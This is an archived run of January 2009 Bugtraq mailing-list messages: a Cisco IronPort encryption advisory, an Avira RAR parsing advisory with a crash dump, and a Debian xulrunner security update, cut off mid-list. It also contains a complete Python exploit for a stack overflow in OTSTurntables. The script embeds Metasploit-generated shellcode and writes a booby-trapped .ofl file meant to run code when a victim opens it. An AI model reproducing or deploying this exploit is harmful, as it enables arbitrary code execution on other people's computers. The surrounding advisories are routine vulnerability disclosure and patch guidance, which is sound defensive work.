Cisco Registered Envelope Service, which is a Cisco-managed software
service.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

The IronPort PXE Encryption solution is affected by two
vulnerabilities that could allow unauthorized individuals to view the
contents of secure e-mail messages. To exploit the vulnerabilities,
attackers must first intercept secure e-mail messages on the network
or via a compromised e-mail account.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

IronPort Encryption Appliance devices contain two vulnerabilities
that could allow unauthorized users to gain access to the IronPort
Encryption Appliance administration interface and modify other users'
settings. These vulnerabilities do not affect Cisco Registered
Envelope Service users.

Cisco has released free software updates that address these
vulnerabilities. There are no workarounds for the vulnerabilities
that are described in this advisory.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

Affected Products
================
Vulnerable Products
+------------------

The following IronPort Encryption Appliance/PostX versions are
affected by these vulnerabilities:

  * All PostX 6.2.1 versions prior to 6.2.1.1
  * All PostX 6.2.2 versions prior to 6.2.2.3
  * All IronPort Encryption Appliance/PostX 6.2.4 versions prior to 6.2.4.1.1
  * All IronPort Encryption Appliance/PostX 6.2.5 versions
  * All IronPort Encryption Appliance/PostX 6.2.6 versions
  * All IronPort Encryption Appliance/PostX 6.2.7 versions prior to 6.2.7.7
  * All IronPort Encryption Appliance 6.3 versions prior to 6.3.0.4
  * All IronPort Encryption Appliance 6.5 versions prior to 6.5.0.2

The version of software that is running on an IronPort Encryption
Appliance is located on the About page of the IronPort Encryption
Appliance administration interface.

Note: Customers should contact IronPort support to determine which
software fixes are applicable for their environment. Please consult
the Obtaining Fixed Software section of this advisory for more
information.

Products Confirmed Not Vulnerable
+--------------------------------

IronPort C, M and S-Series appliances are not affected by these
vulnerabilities. Although C-Series appliances can be configured to
use a local IronPort Encryption Appliance for per-message key
retention, the C-Series appliances are not vulnerable. The Cisco
Registered Envelope Service is not vulnerable.

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
======
Note: IronPort tracks bugs using an internal system that is not
available to customers. The IronPort bug tracking identifiers are
provided for reference only.

PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Individual PXE Encryption users are vulnerable to two message privacy
vulnerabilities that could allow an attacker to gain access to
sensitive information. All the vulnerabilities require an attacker to
first intercept a secure e-mail message as a condition for successful
exploitation. Attackers can obtain secure e-mail messages by
monitoring a network or a compromised user e-mail account.

The IronPort Encryption Appliance contains a logic error that could
allow an attacker to obtain the unique, per-message decryption key
that is used to protect the content of an intercepted secure e-mail
message without user interaction. Using the decryption key, an
attacker could decrypt the contents of the secure e-mail message.
This vulnerability is documented in IronPort bug 8062 and has been
assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0053.

By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

The administration interface of IronPort Encryption Appliance devices
contains a cross-site request forgery (CSRF) vulnerability that could
allow an attacker to modify a user's IronPort Encryption Appliance
preferences, including their user name and personal security pass
phrase, if the user is logged into the IronPort Encryption Appliance
administration interface. Exploitation of the vulnerability will not
allow an attacker to change a user's password. This vulnerability is
documented in IronPort bug 5806 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0055.

The administration interface of IronPort Encryption Appliance devices
also contains a cross-site request forgery (CSRF) vulnerability that
could allow an attacker to execute a command and modify a user's
IronPort Encryption Appliance preferences, including their user name
and personal security pass phrase, under certain circumstances when a
user logs out of the IronPort Encryption Appliance administration
interface. Exploitation of the vulnerability will not allow an
attacker to change a user's password. This vulnerability is
documented in IronPort bug 6403 and has been assigned Common
Vulnerabilities and Exposures (CVE) identifier CVE-2009-0056.

Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062

CVSS Base Score - 7.1
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - None
    Availability Impact - None

CVSS Temporal Score - 5.9
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

PXE Encryption Phishing Vulnerabilities - IronPort Bug 8149

CVSS Base Score - 6.1
    Access Vector - Network
    Access Complexity - High
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 5
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance CSRF Vulnerability - IronPort Bug 5806

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

IronPort Encryption Appliance Logout Action CSRF Vulnerability - IronPort Bug 6403

CVSS Base Score - 5.8
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

Impact
=====
PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to obtain user credentials and view the contents of
intercepted secure e-mail messages, which could result in the
disclosure of sensitive information.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to access user accounts on an IronPort Encryption Appliance
device, which could result in the modification of user preferences.

Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

Workarounds
==========
There are no workarounds for the vulnerabilities that are described
in this advisory.

There are mitigations available to help prevent exploitation of the
PXE Encryption phishing-style vulnerability. Phishing attacks can be
greatly reduced if DomainKeys Identified Mail (DKIM) and Sender
Policy Framework (SPF) are implemented on IronPort e-mail gateways to
help ensure message integrity and source origin. Additionally, the
PXE Encryption solution contains an anti-phishing Secure Pass Phrase
feature to ensure that secure notification e-mail messages are valid.
This feature is enabled by recipients when configuring their PXE user
profile. Cisco has released a best practices document that describes
several techniques to mitigate against the phishing-style attacks
that is available at the following link:

http://www.cisco.com/web/about/security/intelligence/bpiron.html

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. The affected products in this advisory are directly
supported by IronPort, and not via the Cisco TAC organization.
Customers should contact IronPort technical support at the link below
to obtain software fixes. IronPort technical support will assist
customers in determining the correct fixes and installation
procedures. Customers should direct all warranty questions to
IronPort technical support.

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

http://www.ironport.com/support/contact_support.html

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.

J.B. Snyder of Brintech reported a method for obtaining PXE
Encryption user credentials via a phishing-style attack to Cisco.

All other vulnerabilities were discovered by Cisco or reported by
customers.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-14 | public   |
|          |                 | release  |
+---------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:

http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

iD8DBQFJbhoo86n/Gc8U/uARAjuxAJ4oLc1JjS7N9728Ueb6JB7Y2LVJtACfaSfA
A6WIz481vajHya3jIlp+/Xc�J6
-----END PGP SIGNATURE-----

From - Wed Jan 14 14:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39177-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 62803EC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:22:16 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 93348236FC1; Wed, 14 Jan 2009 10:52:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9573 invoked from network); 14 Jan 2009 16:50:50 -0000
Date: 14 Jan 2009 17:14:39 -0000
Message-ID: <20090114171439.13264.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: crimson.loyd@gmail.com
To: bugtraq@securityfocus.com
Subject: OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
Status:   

#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
#  Discovered & exploited bY suN8Hclf
#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
#  Tested on: Windows XP SP2 Polish Full patched
#  
#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
#
#  Thanks to Myo and to everyone who knows what hacking really is 
#  Not for money dude, only for fun !!!

print "====================================================================="
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
print " bY suN8Hclf (crimson.loyd@gmail.com)"
print "====================================================================="

nops = "\x90" * 4
ret = "\x75\x52\x46";   # call ebx

# win32_exec -  EXITFUNC=seh CMD�lc Size0 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
    )
num = 276 - 4 - 160
buff = "\x41" * num

exploit = nops + shellcode + buff + ret
try:
    out_file = open("open_me.ofl",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nNow open open_me.ofl file to exploit bug!\n")
except:
    print "WTF?"

From - Wed Jan 14 14:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39178-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6FE5BEC14A
for <lists@securityspace.com>; Wed, 14 Jan 2009 14:32:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 39269236F3F; Wed, 14 Jan 2009 10:52:44 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9765 invoked from network); 14 Jan 2009 16:52:34 -0000
Date: Wed, 14 Jan 2009 18:15:49 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
Reply-To: Thierry Zoller <Thierry@Zoller.lu>
Organization: Kachkeis CoKG
X-Priority: 3 (Normal)
Message-ID: <1603724654.20090114181549@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: 8bit
X-Originating-IP: 91.50.119.29
Status:   

______________________________________________________________________

     Avira - RAR -Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira Antivr Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir & AntiSpam for KEN! 4
                Avira WebProtector for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver�
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                Avira AntiVir Mobile
                Avira SmallBusiness Suite
                Avira Business Bundle
                Avira AntiVir NetGate Bundle
                Avira AntiVir NetWork Bundle
                Avira AntiVir GateWay Bundle
                Avira AntiVir Campus (for Education)
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices  has  not  been
tested nor confirmed to exist, there is however  reason  to  believe
that    the    flaw    existed    in    this    products     aswell.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of  self-developed  protection
solutions for professional and private use. The company  belongs  to
the pioneers in this  sector  with  over  twenty  years  experience.

The protection experts have numerous  company  locations  throughout
Germany and cultivate partnerships in  Europe,   Asia  and  America.
Avira has more than 180 employees at their main office  in  Tettnang
near Lake Constance and is one  of  the  largest  employers  in  the
region.  There  are  around  250  people  employed  worldwide  whose
commitment is continually being confirmed by awards.  A  significant
contribution to protection is the Avira AntiVir  Personal  which  is
being  used  by   private    users    a    million    times    over.

AV-Comparatives e.V.  have  chosen  Avira  AntiVir  Premium  as  the
best anti-virus solution of 2008 

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a  RAR  archive  and  attacker
might trigger division by zero and null point exceptions. The attack vector  should  be  rated as  remote  as  an  attachement  to    an    e-mail    is    enough.

*Anybody  else  noticed  that  the  amount  of  details   in    most
advisories have *become less than usefull ?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the  impact  is  a  Denial  of  Service  condition  in
others to an invalid read size  of  4  bytes  which  again  in  some
cases lead to an null pointer dereference.

The RAR parser inside the  module  leads  to  various  errors  whose
exploitability index is rated "I don't have time for this now  -  so
let's say 'maybe'" also sometimes known as "I lack the  time  and/or
the skill to do so". 


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The    Vulnerability    notification    policy    i    adhere    to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

 
17/12/2008  :  Sent  notice   to    the    correct    mail    adress
security@avira. com

17/12/2008 : Avira achknowledges receipt 

17/12/2008 : Avira sends details of  the  root  cause  on  the  same
day "The  crash  occurs  in  a  heavily  corrupted,   generated  RAR
archive while extracting the contents of the 22nd  file.   We  can't
give  any  file  names  as  they  are  non-printable  characters.  "

13/01/2009 : Avira notifies me that the  issue  was  fixed  with  an
update that shipped with AVPack 8.1.3.5  on  the  09/01/2009

14/01/2009 : Avira states  that  all  products  have  been  affected
except  "Securityy  Management  Center"  and  the  "Internet  Update
Manager". "Das bedeutet im Prinzip wirklich alle  Produkte,   ausser
Produkte wie eben das Security Management Center oder  der  Internet
Update Manager"

14/01/2009 : Release of this advisory 


Thierry Zoller
http://blog.zoller.lu

From - Wed Jan 14 16:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39179-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D4F32EC747
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:30:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id EDD39236FD2; Wed, 14 Jan 2009 14:12:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10742 invoked from network); 14 Jan 2009 20:05:38 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Wed, 14 Jan 2009 21:28:56 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090114202856.GA14543@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.179.203
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1704-1] New xulrunner packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <i_SV-9EHewL.A.ZXB.gskbJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 14 Jan 2009 20:29:20 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1704                    security@debian.org
http://www.debian.org/security/                           Steffen Joeris
January 14, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xulrunner
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2008-5500

   Jesse Ruderman  discovered that the layout engine is vulnerable to
   DoS attacks that might trigger memory corruption and an integer
   overflow. (MFSA 2008-60)

CVE-2008-5503

   Boris Zbarsky discovered that an information disclosure attack could
   be performed via XBL bindings. (MFSA 2008-61)

CVE-2008-5506

   Marius Schilder discovered that it is possible to obtain sensible
   data via a XMLHttpRequest. (MFSA 2008-64)

CVE-2008-5507

   Chris Evans discovered that it is possible to obtain sensible data
   via a JavaScript URL. (MFSA 2008-65)

CVE-2008-5508

   Chip Salzenberg discovered possible phishing attacks via URLs with
   leading whitespaces or control characters. (MFSA 2008-66)

CVE-2008-5511

   It was discovered that it is possible to perform cross-site scripting
   attacks via an XBL binding to an "unloaded document." (MFSA 2008-68)

CVE-2008-5512

   It was discovered that it is possible to run arbitrary JavaScript
   with chrome privileges via unknown vectors. (MFSA 2008-68)

For the stable distribution (etch) these problems have been fixed in
version 1.8.0.15~pre080614i-0etch1.

For the testing distribution (lenny) and the unstable distribution (sid)
these problems have been fixed in version 1.9.0.5-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1.diff.gz
    Size/MD5 checksum:      971 73ec26e81ce6e401845eb070aa26d909
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1.dsc
    Size/MD5 checksum:     1981 87dd485ac774e78373be5a196cbc8320
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i.orig.tar.gz
    Size/MD5 checksum: 43320191 82b3061f947787bf267a36513a6bd2dd

Architecture independent packages:

  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   231436 f692e056f6eccb9633771a1b5d56d115
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul-common_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  1052120 9935f278d06c5256a1cb6d34f6b43777
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   176532 03d96486a1cb92ca65b39376add42232
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  2638014 f4c9fed2489696b18ecedf945729ffa7
  http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs1_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:    37402 033e412379eab51f4608530af659596a
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  1032570 b8277c4699e9f2edc9131c525c72ac2a
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   208008 d6685b7c5a83eb2fc383ad2284e0c300
  http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:    37436 a668ef6417fe2f868964b2e1f1cd9028

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum: 46039574 068112b86f727680427633606c026ee8
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   905956 ab2dae7df915ed9df912a45332feda25
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:    53462 1211c97fa83041bfdd3d89c5d0cbe49c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   739356 038af743b90f988367f7cae810adca30
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
